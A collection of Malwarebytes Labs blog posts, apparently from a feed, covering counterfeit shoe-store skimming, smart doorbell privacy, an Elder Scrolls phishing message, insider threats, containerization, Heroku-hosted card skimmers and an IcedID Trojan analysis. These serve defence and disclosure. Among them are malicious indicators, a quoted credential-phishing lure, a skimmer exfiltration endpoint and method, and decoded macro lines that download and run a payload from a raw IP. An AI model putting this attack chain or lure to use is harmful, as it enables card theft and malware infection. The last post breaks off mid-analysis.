scarpastate[.]com
schoenenbeste[.]com
schoenenprofile[.]com
schuherunlau[.]com
schuhesize[.]com
schuhneu[.]com
schuheplace[.]com
schuheprofile[.]com
scopri19[.]com
showam97[.]com
shoehallrun[.]com
sizehaven[.]com
showschuh[.]com
skorunvit[.]com
sjjshoe[.]com
skoprofile[.]com
skonmd[.]com
snadnket[.]com
sneakerbyside[.]com
sneakerebe[.]com
sneakerees[.]com
sneakermodelli[.]com
sneakerunow[.]com
snkrsstrike[.]com
snugfree[.]com
snstuff[.]us
sortheads[.]com
sort5sko[.]com
sportkopen[.]com
sportinghave[.]com
sportopwears[.]com
sports-be[.]com
sportsalebay[.]com
sportsneu[.]com
sportsonfr[.]com
sports-ha[.]com
stayonlinese[.]com
sprishoes[.]com
startingnice[.]com
streetcolouring[.]com
stripeschuhe[.]com
stuffnuevo[.]com
stuffkicks[.]com
stuffkopen[.]com
stuffoutfr[.]com
stuffpknit[.]com
styleftwr[.]com
stvprxsko[.]com
styleschoen[.]com
styleschuh[.]com
stylezapato[.]com
suitableshoe[.]com
swzoomsch[.]com
texmedever[.]com
tehshoes[.]com
takerightback[.]com
tedschuhe[.]com
thegodwillout[.]com
thxshoe[.]com
tiendaout[.]com
tosomtosideaway[.]com
trainernmdcbk[.]com
trainersnmd[.]com
tstripeseqt[.]com
uomoweekly[.]com
usesmoother[.]com
usualshares[.]com
valuablemax[.]com
vertchausfr[.]com
verstaleshoes[.]com
vtfreencs[.]com
vvvfabrices[.]com
walkingnice[.]com
wearingselect[.]com
willgoout[.]com
willrunalong[.]com
willrunout[.]com
willhiking[.]com
winatershoes[.]com
wmboost[.]com
withnormal[.]com
willtrval[.]com
witroze[.]com
wmsnkrs[.]com
wsnkrs[.]com
zapatosnmd[.]com
zwtnlzsen[.]com

Skimmer

103.139.113[.]34

The post Hundreds of counterfeit online shoe stores injected with credit card skimmer appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Please don’t buy this: smart doorbells

Malware Bytes Security - Mon, 12/09/2019 - 12:15pm

Though Black Friday and Cyber Monday are over, the two shopping holidays were just precursors to the larger Christmas season—a time of year when online packages pile high on doorsteps and front porches around the world.

According to some companies, it’s only logical to want to protect these packages from theft, and wouldn’t it just so happen that these same companies have the perfect device to do that—smart doorbells.

Equipped with cameras and constantly connected to the Internet, smart doorbells provide users with 24-hour video feeds of the view from their front doors, capturing everything that happens when a user is away at work or sleeping in bed.

Some devices, like the Eufy Video Doorbell, can allegedly differentiate between a person dropping off a package and, say, a very bold, very unchill goat marching up to the front door (it really happened). Others, like Google’s Nest Hello, proclaim to be able to “recognize packages and familiar faces.” Many more, including Arlo’s Video Doorbell and Netatmo’s Smart Video Doorbell, can deliver notifications to users whenever motion or sound are detected nearby.

The selling point for smart doorbells is simple: total vigilance in the palms of your hands. But if you look closer, it turns out a privatized neighborhood surveillance network is a bad idea.

To start, some of the more popular smart doorbell products have suffered severe cybersecurity vulnerabilities, while others lacked basic functionality upon launch. Worse, the data privacy practices at one major smart doorbell maker resulted in wanton employee access to users’ neighborhood videos. Finally, partnerships between hundreds of police departments and one smart doorbell maker have created a world in which police can make broad, multi-home requests for user videos without needing to show evidence of a crime.

The path to allegedly improved physical security shouldn’t involve faulty cybersecurity or invasions of privacy.

Here are some of the concerns that cybersecurity researchers, lawmakers, and online privacy advocates have found with smart doorbells.

Congress fires off several questions on privacy

On November 20, relying on public reports from earlier in the year, five US Senators sent a letter to Amazon CEO Jeff Bezos, demanding answers about a smart doorbell company that Bezos’ own online retail giant swallowed up for $839 million—Ring.

According to an investigation by The Intercept cited by the senators, beginning in 2016, Ring “provided its Ukraine-based research and development team virtually unfettered access to a folder on Amazon’s S3 cloud storage service that contained every video created by every Ring camera around the world.”

The Intercept’s source also said that “at the time the Ukrainian access was provided, the video files were left unencrypted, the source said, because of Ring leadership’s ‘sense that encryption would make the company less valuable,’ owing to the expense of implementing encryption and lost revenue opportunities due to restricted access.”

Not only that, but, according to the Intercept, Ring also “unnecessarily” provided company executives and engineers with access to “round-the-clock live feeds” of some customers’ cameras. For Ring employees who had this type of access, all they needed to actually view videos, The Intercept reported, was a customer’s email address.

The senators, in their letter, were incensed.

“Americans who make the choice to install Ring products in and outside their homes do so under the assumption that they are—as your website proclaims—‘making the neighborhood safer,’” the senators wrote. “As such, the American people have a right to know who else is looking at the data they provide to Ring, and if that data is secure from hackers.”

The lawmakers’ questions came hot on the heels of Senator Ed Markey’s own efforts in September into untangling Ring’s data privacy practices for children. How, for instance, does the company ensure that children’s likenesses won’t be recorded and stored indefinitely by Ring devices, the senator asked.

According to The Washington Post, when Amazon responded to Sen. Markey’s questions, the answers potentially came up short:

“When asked by Markey how the company ensured that its cameras would not record children, [Amazon Vice President of Public Policy Brian Huseman] wrote that no such oversight system existed: Its customers ‘own and control their video recordings,’ and ‘similar to any security camera, Ring has no way to know or verify that a child has come within range of a device.’”

But Sen. Markey’s original request did not just focus on data privacy protections for children. The Senator also wanted clear answers on an internal effort that Amazon had provided scant information on until this year—its partnerships with hundreds of police departments across the country.

Police partnerships

In August, The Washington Post reported that Ring had forged video-sharing relationships with more than 400 police forces in the US. Today, that number has grown to at least 677—an increase of roughly 50 percent in just four months.

The video-sharing partnerships are simple.

By partnering with Ring, local police forces gain the privilege of requesting up to 12 hours of video spanning a 45-day period from all Ring devices that are included within half a square mile of a suspected crime scene. Police officers request video directly from Ring owners, and do not need to show evidence of a crime or obtain a warrant before asking for this data.

Once the video is in their hands, police can, according to Ring, keep it for however long they wish and share it with whomever they choose. The requested videos can sometimes include video that takes place inside a customer’s home, not just outside their front door.

At first blush, this might appear like a one-sided relationship, with police officers gaining access to countless hours of local surveillance for little in return. But Ring has another incentive, far away from its much-trumpeted mission “to reduce crime in neighborhoods.” Ring’s motivations are financial.

According to Gizmodo, for police departments that partner up with Ring to gain access to customer video, Ring gains near-unprecedented control in how those police officers talk about the company’s products. The company, Gizmodo reported, “pre-writes almost all of the messages shared by police across social media, and attempts to legally obligate police to give the company final say on all statements about its products, even those shared with the press.”

Less than one week after Gizmodo’s report, Motherboard obtained documents that included standardized responses for police officers to use on social media when answering questions about Ring. The responses, written by Ring, at times directly promote the company’s products.

Further, in the California city of El Monte, police officers offered Ring smart doorbells as an incentive for individuals to share information about any crimes they may have witnessed.

The partnerships have inflamed multiple privacy rights advocates.

“Law enforcement is supposed to answer to elected officials and the public, not to public relations operatives from a profit-obsessed multinational corporation that has no ties to the community they claim they’re protecting,” said Evan Greer, deputy director of Fight for the Future, when talking to Vice.

Matthew Guariglia, policy analyst with Electronic Frontier Foundation, echoed Greer’s points:

“This arrangement makes salespeople out of what should be impartial and trusted protectors of our civic society.”

Cybersecurity concerns

When smart doorbells aren’t potentially invading privacy, they might also be lacking the necessary cybersecurity defenses to work as promised.

Last month, a group of cybersecurity researchers from Bitdefender announced that they’d discovered a vulnerability in Ring devices that could have let threat actors swipe a Ring user’s WiFi username and password.

The vulnerability, which Ring fixed when it was notified privately about it in the summer, relied on the setup process between a Ring doorbell and a Ring owner’s Wi-Fi network. To properly set up the device, the Ring doorbell needs to send a user’s Wi-Fi network login information to the doorbell. But in that communication, Bitdefender researchers said Ring had been sending the information over an unencrypted network.

Unfortunately, this vulnerability was not the first of its kind. In 2016, a company that tests for security vulnerabilities found a flaw in Ring devices that could have allowed threat actors to steal WiFi passwords.

Further, this year, another smart doorbell maker suffered so many basic functionality issues that it stopped selling its own device just 17 days after its public launch. The smart doorbell, the August View, went back on sale six months later.

Please don’t buy

We understand the appeal of these devices. For many users, a smart doorbell is the key piece of technology that, they believe, can help prevent theft in their community, or equip their children with a safe way to check on suspicious home visitors. These devices are, for many, a way to calmer peace of mind.

But the cybersecurity flaws, invasions of privacy, and attempts to make public servants into sales representatives go too far. The very devices purchased for security and safety belie their purpose.

Therefor, this holiday season, we kindly suggest that you please stay away from smart doorbells. Deadbolts will never leak your private info.

The post Please don’t buy this: smart doorbells appeared first on Malwarebytes Labs.

Categories: Malware Bytes

A week in security (December 2 – December 8)

Malware Bytes Security - Mon, 12/09/2019 - 11:47am

Last week on Malwarebytes Labs, we took a look at a new version of the IcedID Trojan, described web skimmers up to no good, and took a deep dive into containerization. We also explored a report bringing bad news for organizations and insider threats, and threw a spotlight on a video game phish attack.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (December 2 – December 8) appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Fake Elder Scrolls Online developers go phishing on PlayStation

Malware Bytes Security - Fri, 12/06/2019 - 3:29pm

A player of popular gaming title Elder Scrolls Online recently took to Reddit to warn users of a phish via Playstation messaging. This particular phishing attempt is notable for ramping up the pressure on recipients—a classic social engineering technique taken to the extreme.

A terms of service violation?

In MMORPG land, the scammers take a theoretically plausible deadline, crunch it into something incredibly short and ludicrous, and go fishing for the catch of the day. Behold the pressure-laden missive from one fake video game developer to a player:

Click to enlarge

The text of the phishing message reads as follows:

We have noticed some unusual activity involving this account. To be sure you are the rightful owner, we require you to respond to this alert with the following account information so that you may be verified,

– Email address

– Password

_ Date of birth on the account

In response to a violation of these Terms of Service, ZeniMax may issue you a warning, suspend or restrict certain features of the account. We may also immediately terminate any and all accounts that you have established. Temporarily or permanently ban the account, device, and/or machine from accessing, receiving, playing or using all or certain services.

Under the current circumstances, you have 15 minutes from opening this alert to respond with the required information. Failure to do so will result in an immediate account ban, permanently losing access to our servers on all platforms, along with all characters  associated with the account in question. Please be sure to double check your information and spelling before sending.

Yes, you read that correctly—a grand total of 15 whole minutes to panic email scammers back with your login details. But what exactly happened to warrant such an immediate need for verification? The vagueness of the fake message may actually work in the scammer’s favour here because MMORPG titles are often rife with cheating/botting/scamming, so developers are typically light on information when genuine infractions occur.

FOMO: oh no

FOMO, fear of missing out, is the lingering fear that not only have they never had it so good, but the “they” in question almost certainly isn’t you.

Marketers and sales teams exploit this ruthlessly, with sudden sales and the promise of things you can’t do without. Breaking hotel deals on websites can’t help but tell you how many people have the same deal open RIGHT NOW.

Video games, especially online titles and MMORPGs, take a similar approach, offering in-game purchases but rotating items slowly, leading to a form of digital scarcity that encourages transactions because gamers don’t know if the item will be seen again.

Inventory space, character slots, and many more crucial elements are at a premium, and people invest serious money to make the most out of their experience. With this in mind, people tend to be particular about keeping their account secure.

As a result, scammers are hugely effective at turning FOMO on its head, giving people a nasty dose of “fear of something about to happen or else.” Had a spot of bother with ransomware? No sweat, pay us in Bitcoin and you’ll get your documents back—as long as you do it within three days. Fake sextortion email claiming they’ve recorded you watching pornography? Yeah, that’ll be $1,000 in 48 hours or we’ll release the footage and tell all your friends and family.

“It wasn’t me, what did I do?”

You’ll often see people banned  from titles complaining on forums that all access has been revoked, with no explanation why besides a “You are banned, sorry” type message. Quite often they won’t even be able to follow up with support because the ban also locks them out of being able to raise a ticket. 

Scammers know they can skip some of the fake explanation shovel work as nobody ever receives a detailed explanation. This is to obscure the inner workings of fraud detection systems: If they spilled the beans, malicious individuals would adjust their behaviour accordingly. That’s a tricky situation for developers to tightrope walk across, but it is possible in the form of additional security measures. Does Elder Scrolls Online meet the challenge?

Sadly, the game doesn’t allow players to lock down accounts with a third-party authenticator. There’s no mobile app, and there are zero authentication sticks. What they do have is a few password suggestions and some information about their one-time password system.

It’s certainly good that the password system exists, and one would hope it would spring into life in this case, but players would probably appreciate a little more control over their security choices, as well as a few safety nets when things go wrong.

By comparison, the hugely popular Black Desert Online offers Google authenticator two-factor authentication (2FA). Blizzard has you covered with their own authenticator. Guild Wars offers both an authenticator app and SMS lockdowns.

Some simple rules to follow

Regardless of which game you play, remember:

  • Don’t reuse passwords
  • Make the password as strong as the system allows
  • Tie your account to a locked-down email address, ideally also secured with 2FA
  • Never, ever send login details to an email or text message asking for them until you’ve authenticated the message by hovering over the email address and links to see if they are legitimate, Googling to see if there are known scams or phishes associated with the company in question, and reading over the instructions carefully.
  • If you’re still in doubt whether an email is legitimate or not, err on the side of caution and go directly to your account’s website/login page. If there is a need to verify or change credentials, you can change them there.

Phishing is one of the oldest cyberattack methods on the book, yet it remains a favorite of scammers because, quite simply, it works. Don’t be fooled by FOMO, high-pressure deadlines, or too-good-to-be-true deals.

The post Fake Elder Scrolls Online developers go phishing on PlayStation appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Report: Organizations remain vulnerable to increasing insider threats

Malware Bytes Security - Thu, 12/05/2019 - 11:00am

The latest data breach at Capital One is a noteworthy incident not because it affected over 100 million customer records, 140,000 Social Security numbers (SSNs), and 80,000 linked bank accounts. Nor was it special because the hack was the result of a vulnerable firewall misconfiguration.

Many still talk about this breach because a leak of this magnitude, which we’ve historically seen conducted by nation-state actors, was made possible by a single skilled insider: Paige A. Thompson. Thompson set a benchmark for single insider threat attacks against the banking industry—and we can expect that benchmark to be cleared.

On a more chilling note, criminal enterprises already have a market opened for corporate employees willing to trade proprietary secrets for cash as a form of “side job.” A number of these underground organizations, unsurprisingly, hail from countries outside the United States, such as Russia and China. Unfortunately for US organizations, these criminal enterprises pay really well.

Recently, Cybersecurity Insiders—in partnership with Gurucul, a behavior, identity, fraud, and cloud security analytics company—released results of its research on insider threats, revealing the latest trends, organizational challenges, and methodologies on how IT professionals prepare for and deal with this danger. Here are some of their key findings:

  • More than half of organizations surveyed (58 percent) said that they are not effective at monitoring, detecting, and responding to insider threats.
  • 63 percent of organizations think that privileged IT users pose the biggest security risk. This is followed by regular employees (51 percent), contractors/service providers/temporary workers (50 percent), and other privileged users, such as executives (50 percent).
  • 68 percent of organizations feel that they are moderately to extremely vulnerable to insider threats.
  • 52 percent of organizations confirm that it is more difficult for them to detect and prevent insider threats than detecting and preventing external cyberattacks.
  • 68 percent of organizations have observed that insider threats have become more frequent in the past 12 months.

The report also states reasons why organizations are increasingly having difficulty detecting and preventing insider threats, which include the increased use of applications and/or tools that leak data, an increased amount of data that leaves the business environment/perimeter, and the misuse of credential or access privileges.

The possible reasons for difficulty in detecting and preventing insider threats (Courtesy of Cybersecurity Insiders)

The CERT Insider Threat Center, part of the CERT Division at Carnegie Mellon’s Software Engineering Institute (SEI) that specializes in insider threats, has recently put forth a blog series that ran from October 2018 to August 2019 on the patterns and trends of insider threats. These posts contained breakdowns and analyses of what insider threats look like across certain industry sectors, statistics, and motivations behind insider incidents—and they’re quite different.

Below are a few high-level takeaways from these posts:

  • The CERT Insider Threat Center has identified the top three crimes insiders commit across industries: fraud, intellectual property theft, and IT systems sabotage.
  • Fraud is the most common insider threat incident recorded in the federal government (60.8 percent), finance and insurance (87.8 percent), state and local governments (77 percent), healthcare (76 percent), and the entertainment (61.5 percent) industries.
  • All sectors consistently experienced an insider incident perpetrated by trusted business partners. Typically, it ranges between 15 to 25 percent across all insider incident types and sectors. This should be an eye-opening statistic, especially for SMBs, as research suggests that they partner more with other businesses over hiring employees.
Scope of the insider threat problem (Courtesy of the Carnegie Mellon University Software Engineering Institute) Insider threats on the spotlight—finally!

The National Counterintelligence and Security Center (NCSC) and the National Insider Threat Task Force (NITTF), together with the Federal Bureau of Investigation, the Office of the Under Secretary of Defense (Intelligence), the Department of Homeland Security, and the Defense Counterintelligence and Security Agency declared September as National Insider Threat Awareness Month, and it launched this year.

The goal of the annual campaign is to educate employees about insider threats and to maximize the reporting of abnormal employee behavior before things escalate to an insider incident.

“All organizations are vulnerable to insider threats from employees who may use their authorized access to facilities, personnel or information to harm their organizations—intentionally or unintentionally,” says NCSC Director William Evanina in a press release [PDF], “The harm can range from negligence, such as failing to secure data or clicking on a spear-phishing link, to malicious activities like theft, sabotage, espionage, unauthorized disclosure of classified information or even violence.”

We have tackled insider threats at length on several occasions on the Malwarebytes Labs blog. Now is always the right time for organizations to give this cybersecurity threat some serious thought and plan on how they can combat it. After all, if businesses are only concerned about attacks from the outside, at some point they’ll be hit with attacks from the inside. The good news is organizations won’t have to wait for next September to start dealing with this problem today.

The CERT Insider Threat Center offers a list of common-sense recommendations for mitigating insider threats that every cybersecurity, managerial, legal, and human resource personnel should have on hand. The Center also showcases a trove of publications if organizations would like to go deeper.

We’d also like to add our own blog on the various types of insiders your organization may encounter and certain steps you can take to nipping insider risks in the bud. We also paid closer attention to workplace violence, a type of insider threat that is often forgotten.

Stay safe! And remember: When you see something, say something.

The post Report: Organizations remain vulnerable to increasing insider threats appeared first on Malwarebytes Labs.

Categories: Malware Bytes

Explained: What is containerization?

Malware Bytes Security - Wed, 12/04/2019 - 12:00pm

Containerization. Another one of those tech buzzwords folks love to say but often have no idea what it means. A better way to organize children’s toys? The act of bringing tupperware out to dinner to safely transport home leftovers? Another name for Russian dolls?

Containerization is, of course, none of those things. But its definition might be best captured in a quick example rather than a description:

Eliza wrote a program on her Windows PC to streamline workflow between her department, a second department within the company, and a third outside agency. She carefully configured the software to eliminate unnecessary steps and enable low-friction sharing of documents, files, and other assets. When she proudly demoed her program on her manager’s desktop Mac, however, it crashed within seconds—despite working perfectly on her own machine.

Containerization was invented to tackle that problem.

What is containerization?

In traditional software development, programmers code an application in one computing environment that may run with bugs or errors when deployed in another, as was the case with Eliza above. To solve for this, developers bundle their application together with all its related configuration files, libraries, and dependencies required to run in containers hosted in the cloud. This method is called containerization.

The goal of containerization is to allow applications to run in an efficient and bug-free way across different computing environments, whether that’s a desktop or virtual machine or Windows or Linux operating system. The demand for applications to run consistently among different systems and infrastructures has moved development of this technology along at a rapid pace. The use of different platforms within business organizations and the move to the cloud are undoubtedly huge contributors to this demand.

Containerization is almost always conducted in a cloud environment, which contributes to its scalability. While some of the most popular cloud services are known for data storage—Google Drive, iCloud, Box—other public cloud computing companies, such as Amazon Web Services, Oracle, or Microsoft Azure allow for containerization. In addition, there are private cloud solutions, in which companies host data on an enterprise intranet or data center.

The difference between containerization and virtualization

Containerization is closely related to virtualization, and it often helps to compare and contrast the two in order to get a better understanding of how containerization can help organizations build and run applications.

Containers, unlike virtual machines (VMs), do not require the overhead of an entire operating system (OS). That means containerization is less demanding in the hardware department and needs fewer computing resources than what you’d need to run the same applications on virtual machines.

Organizations could even opt to share common libraries and other files among containers to further reduce the overhead. Sharing of these files happens at the application layer level, where VMs run on the hardware layer. As a result, you can run more application containers that share a common OS.

Image courtesy of ElectronicDesign.

VMs are managed by a hypervisor (aka virtual machine monitor) and utilize VM hardware (1) while containerized systems provide operating system services from the underlying host and isolate the applications using virtual-memory hardware or (2) the container manager provides an abstract OS for the containers. This method eliminates a layer and in doing so, saves resources and provides a quicker startup time, when necessary.

Why use containerization?

There are a few reasons why organizations decide to use containerization:

  • Portability: You can run the application on any platform and in any infrastructure. Switch to a different cloud supplier? No problem.
  • Isolation: Mishaps and faults in one container do not carry over to other containers. This means maintenance, development, and troubleshooting can be done without downtime of the other containers.
  • Security: The strict isolation from other applications and the host system also results in better security.
  • Management: You don’t have to think about the effects on other applications when you update, add further developments, or even rollback.
  • Scalability: Instances of containers can be copied and deployed in the cloud to match the growing needs of the organization.
  • And last but not least, cost effectiveness: Compared to virtualized solutions, containerization is much more efficient and it reduces costs for server instances, OS licenses, and hardware.
Security risks for containers

Since containerization started out as a means for efficient development and cost savings and quickly ballooned in adoption and implementation, security was unfortunately a low priority in its design—as it often is in tech innovation.

Yet containers have a large attack surface, as they tend to include complex applications that use components which communicate with each other over the network. To the standard vulnerabilities introduced by various application components, add other security gaps created by misconfigurations, which result in inadequate authorization issues. These vulnerabilities will not be limited to the top layer of the application.

Add to these vulnerabilities the limitations of some security vendors, whose enterprise programs may not be able to protect containers running in the cloud environment. Due to the isolated nature of the containers, some security solutions may not be able to scan inside active containers or monitor their behavior as they would when running on a virtual machine.

Containers’ security postures are further weakened by a likely lack of awareness by their users about these limitations, which might encourage less stringent oversight. However, there are already prime examples of threat actors taking advantage of containerization developers’ security indifference.

On November 26, ZDNet reported that a hacking group was mass-scanning the Internet looking for Docker platforms with open API endpoints to deploy a classic XMRig cryptominer. What’s worse is that they also disabled security software running on those instances. Containerization users must take care not to leave admin ports and API endpoints exposed online, otherwise cybercriminals can easily wreak havoc. If they were able to install cryptominers, what’s to stop them from dropping ransomware?

Security recommendations

In order to shore up containers so that applications can both run efficiently and bug-free in diverse environments and remain secure, there are a few simple pieces of advise developers and operators should keep in mind.

Probably the most important: When copying the runtime system, developers, managers, or operators will need to check whether the latest patches and updates have been applied for all components. Otherwise, programmers could copy outdated, insecure, or even infected libraries to the next container. One common piece of advice is to store a model container in a secure place that can be updated, patched, and scanned before it is copied to work environments.

Second: When migrating a container to a different environment, the operator will have to take into account the possible vulnerabilities in both the container and new environment, as well as the influence of the container’s behavior on the new environment. Despite its portability, the container might require additional demands for safety measures or configuration of the container management system.

The rest of containerization’s security efforts can be summed up in a few short bullets:

  • Check for exposed endpoints and close the ports, if there are any.
  • Limit direct interaction between containers.
  • Use providers that can assist with security know-how, if it’s not available in house.
  • Use container isolation to your advantage, but also be aware of the consequences. Configure containers to be read-only.
  • If available, use your container orchestration platform to enhance and keep tabs on security.
  • Consider security solutions that can scan and protect containers in the cloud working environment if your current provider is unable.

These extraneous security measures might feel counterintuitive, as developers originally set out to have standard containers that behave the same way in every environment and for every user. But they are minor, simple steps that can go a long way in protecting an organization’s data and applications.

Therefore, use containerization as it suits best, but always keep security in mind.

The post Explained: What is containerization? appeared first on Malwarebytes Labs.

Categories: Malware Bytes

There’s an app for that: web skimmers found on PaaS Heroku

Malware Bytes Security - Wed, 12/04/2019 - 11:00am

Criminals love to abuse legitimate services—especially platform-as-a-service (Paas) cloud providers—as they are a popular and reliable hosting commodity used to support both business and consumer ventures.

Case in point, in April 2019 we documented a web skimmer served on code repository GitHub. Later on in June, we observed a vast campaign where skimming code was injected into Amazon S3 buckets.

This time, we take a look at a rash of skimmers found on Heroku, a container-based, cloud PaaS owned by Salesforce. Threat actors are leveraging the service not only to host their skimmer infrastructure, but also to collect stolen credit card data.

All instances of abuse found have already been reported to Heroku and taken down. We would like to thank the Salesforce Abuse Operations team for their swift response to our notification.

Abusing cloud apps for skimming

Developers can leverage Heroku to build apps in a variety of languages and deploy them seamlessly at scale.

Heroku has a freemium model, and new users can experiment with the plaform’s free web hosting services with certain limitations. The crooked part of the Magecart cabal were registering free accounts with Heroku to host their skimming business.

Their web skimming app consists of three components:

  • The core skimmer that will be injected into compromised merchant sites, responsible for detecting the checkout URL and loading the next component.
  • A rogue iframe that will overlay the standard payment form meant to harvest the victim’s credit card data.
  • The exfiltration mechanism for the stolen data that is sent back in encoded format.
iframe trick

Compromised shopping sites are injected with a single line of code that loads the remote piece of JavaScript. Its goal is to monitor the current page and load a second element (a malicious credit card iframe) when the current browser URL contains the Base64 encoded string Y2hlY2tvdXQ= (checkout).

The iframe is drawn above the standard payment form and looks identical to it, as the cybercriminals use the same cascading style sheet (CSS) from portal.apsclicktopay.com/css/build/easypay.min.css.

Finally, the stolen data is exfiltrated, after which victims will receive an error message instructing them to reload the page. This may be because the form needs to be repopulated properly, without the iframe this time.

Several Heroku-hosted skimmers found

This is not the only instance of a credit card skimmer found on Heroku. We identified several others using the same naming convention for their script, all seemingly becoming active within the past week.

Another one on @heroku

hxxps://stark-gorge-44782.herokuapp[.]com/integration.js. Fake form in an iframe. Data goes to hxxps://stark-gorge-44782.herokuapp[.]com/config.php?id= pic.twitter.com/Xa1F2z1Z1a

— Denis (@unmaskparasites) December 2, 2019

In one case, the threat actors may have forgotten to use obfuscation. The code shows vanilla skimming, looking for specific fields to collect and exfiltrate using the window.btoa(JSON.stringify(result)) method.

We will likely continue to observe web skimmers abusing more cloud services as they are a cheap (even free) commodity they can discard when finished using it.

From a detection standpoint, skimmers hosted on cloud providers may cause some issues with false positives. For example, one cannot blacklist a domain used by thousands of other legitimate users. However, in this case we can easily do full qualified domain (FQDN) detections and block just that malicious user.

Indicators of Compromise (IOCs)

Skimmer hostnames on Heroku

ancient-savannah-86049[.]herokuapp.com
pure-peak-91770[.]herokuapp[.]com
aqueous-scrubland-51318[.]herokuapp[.]com
stark-gorge-44782.herokuapp[.]com

The post There’s an app for that: web skimmers found on PaaS Heroku appeared first on Malwarebytes Labs.

Categories: Malware Bytes

New version of IcedID Trojan uses steganographic payloads

Malware Bytes Security - Tue, 12/03/2019 - 1:06pm

This blog post was authored by @hasherezade, with contributions from @siri_urz and Jérôme Segura.

Security firm Proofpoint recently published a report about a series of malspam campaigns they attribute to a threat actor called TA2101. Originally targeting German and Italian users with Cobalt Strike and Maze ransomware, the later wave of malicious emails were aimed at the US and pushing the IcedID Trojan.

During our analysis of this spam campaign, we noticed changes in how the payload was implemented, in particular with some code rewritten and new obfuscation. For example, the IcedID Trojan is now being delivered via steganography, as the data is encrypted and encoded with the content of a valid PNG image. According to our research, those changes were introduced in September 2019 (while in August 2019 the old loader was still in use).

The main IcedID module is stored without the typical PE header and is run by a dedicated loader that uses a custom headers structure. Our security analyst @hasherezade previously described this technique in a talk at the SAS conference (Funky Malware Formats).

In this blog post, we take a closer look at these new payloads and describe their technical details.

Distribution

Our spam honeypot collected a large number of malicious emails containing the “USPS Delivery Unsuccessful Attempt Notification” subject line.

Each of these emails contains a Microsoft Word document as attachment allegedly coming from the United States Postal Service. The content of the document is designed to lure the victim into enabling macros by insinuating that the content had been encoded.

Having a look at the embedded macros, we can see the following elements:

There is a fake error message displayed to the victim, but more importantly, the IcedID Trojan authors have hidden the malicious instructions within a UserForm as labels.

The labels containing numerical ASCII values

The macro grabs the text from the labels, converts it, and uses during execution:

url1 = Dcr(GH1.Label1.Caption)
path1 = Dcr(GH1.Label2.Caption)

For example:

104 116 116 112 58 47 47 49 48 52 46 49 54 56 46 49 57 56 46 50 51 48 47 119 111 114 100 117 112 100 46 116 109 112
converts to: http://104.168.198.230/wordupd.tmp

67,58,92,87,105,110,100,111,119,115,92,84,101,109,112,92,101,114,101,100,46,116,109,112
converts to: C:\Windows\Temp\ered.tmp

The file wordupd.tmp is an executable downloaded with the help of the URLDownloadToFileA function, saved to the given path and run. Moving on, we will take a closer look at the functionality and implementation of the downloaded sample.

Behavioral analysis

As it had before, IcedID has been observed making an injection into svchost, and running under its cover. Depending on the configuration, it may or may not download other executables, including TrickBot.

Dropped files

The malware drops various files on the disk. For example, in %APPDATA%, it saves the steganographically obfuscated payload (photo.png) and an update of the downloader:

It also creates a new folder with a random name, where it saves a downloaded configuration in encrypted form:

Inside the %TEMP% folder, it drops some non-malicious helper elements: sqlite32.dll (that will be used for reading SQLite browser databases found in web browsers), and a certificate that will be used for intercepting traffic:

Looking at the certificate, we can see that it was signed by VeriSign:

Persistence

The application achieves persistence with the help of a scheduled task:

The task has two triggers: at the user login and at the scheduled hour.

Overview of the traffic

Most of the traffic is SSL encrypted. We can also see the use of websockets and addresses in a format such as “data2php?<key>“, “data3.php?<key>“.

Attacking browsers

The IcedID Trojan is known as a banking Trojan, and indeed, one of its important features is the ability to steal data related to banking transactions. For this purpose, it injects its implants into browsers, hooks the API, and performs a Man-In-The-Browser attack.

Inside the memory of the infected svchost process we can see the strings with the configuration for webinjects. Webinjects are modular (typically HTML and JavaScript code injected into a web page for the purpose of stealing data).

Webinjects configuration in the memory of infected svchost

The core bot that runs inside the memory of svchost observes processes running on the system, and injects more implants into browsers. For example, looking at Mozilla Firefox:

The IcedID implant in the browser’s memory

By scanning the process with PE-sieve, we can detect that some of the DLLs inside the browser have been hooked and their execution was redirected to the malicious module.

In Firefox, the following hooks have been installed:

  • nss3.dll : SSL_AuthCertificateHook->2c2202[2c1000+1202]
  • ws2_32.dll : connect->2c2728[2c1000+1728]

A different set was observed in Internet Explorer:

  • mswsock : hook_0[7852]->525d0[implant_code+15d0]
  • ws2_32.dll : connect->152728[implant_code+1728]

The IcedID module running inside the browser’s memory is responsible for applying the webinjects installing malicious JavaScripts into attacked pages.

Fragment of the injected script

The content of the inlined webinject script is available here: inject.js.

It also communicates with the main bot that is inside the svchost process. The main bot coordinates the work of all the injected components, and sends the stolen data to the Command and Control server (CnC).

Due to the fact that the communication is protected by HTTPS, the malware must also install its own certificate. For example, this is the valid certificate for the Bank of America website:

And in contrast, the certificate used by the browser infected by IcedID:

Overview of the changes

As we mentioned, the core IcedID bot, as well as the dedicated loader, went through some refactoring. In this comparative analysis, we used the following old sample: b8113a604e6c190bbd8b687fd2ba7386d4d98234f5138a71bcf15f0a3c812e91

The detailed analysis of this payload can be found here: [1][2][3].

The old loader vs. new

The loader of the previous version of the IcedID Trojan was described in detail here, and here. It was a packed PE file that used to load and inject a headerless PE.

The main module was injected into svchost:

The implants in the svchost’s memory

The implanted PE was divided into two sections, and the first memory page (representing the header) was empty. This type of payload is more stealthy than a full PE injection (as is more common). However, it was possible to reconstruct the header and analyze the sample like a normal PE. (An example of the reconstructed payload is available here: 395d2d250b296fe3c7c5b681e5bb05548402a7eb914f9f7fcdccb741ad8ddfea).

The redirection to the implant was implemented by hooking the RtlExitUserProcess function within svchost’s NTDLL.

When svchost tried to terminate, it instead triggered a jump into the injected PE’s entry point.

The hooked RtlExitUserProcess redirects to payload’s EP

The loader was also filling the pointer to the data page within the payload. We can see this pointer being loaded at the beginning of the payload’s execution:

In the new implementation, there is one more intermediate loader element implemented as shellcode. The diagram below shows the new loading chain:

The shellcode has similar functionality that was previously implemented by the loader in form of a PE. First it injects itself into svchost.

Then it decompresses and injects the payload, which as before is a headerless PE (analogical to the one described here).

Comparing the core

The implementation of the core bot is modified. Yet, inside the code we can find some strings known from the previous sample, as well as a similar set of imported API functions. We can also see some matching strings and fragments of implemented logic.

Fragment of the code from the old implementation

Analogical fragment from the new sample:

Fragment of the code from the new implementation

Comparing both reconstructed samples with the help of BinDiff shows that there are quite a few differences and rewritten parts. Yet, there are parts of code that are the same in both, which proves that the codebase remained the same.

Preview of the similar functions Preview of different/rewritten functions

Let’s follow the execution flow of all the elements from the new IcedID package.

The downloader

